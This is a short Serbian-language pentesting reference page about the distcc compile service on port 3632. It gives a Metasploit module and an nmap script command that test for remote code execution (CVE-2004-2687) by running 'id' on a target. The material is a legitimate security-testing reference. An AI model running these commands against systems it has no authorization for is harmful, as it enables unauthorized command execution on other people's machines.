3632 - Pentesting distcc

Osnovne informacije

Distcc je alat koji poboljšava proces kompajliranja koristeći neiskorišćenu procesorsku snagu drugih računara u mreži. Kada je distcc postavljen na mašini, ova mašina može da distribuira svoje zadace kompajliranja drugom sistemu. Ovaj prijemni sistem mora da pokreće distccd daemon i mora imati instaliran kompatibilan kompajler da bi obradio poslati kod.

Podrazumevani port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Eksploatacija

Proverite da li je ranjiv na CVE-2004-2687 za izvršavanje proizvoljnog koda:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Ne mislim da shodan detektuje ovu uslugu.

Resources

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Post created by Álex B (@r1p)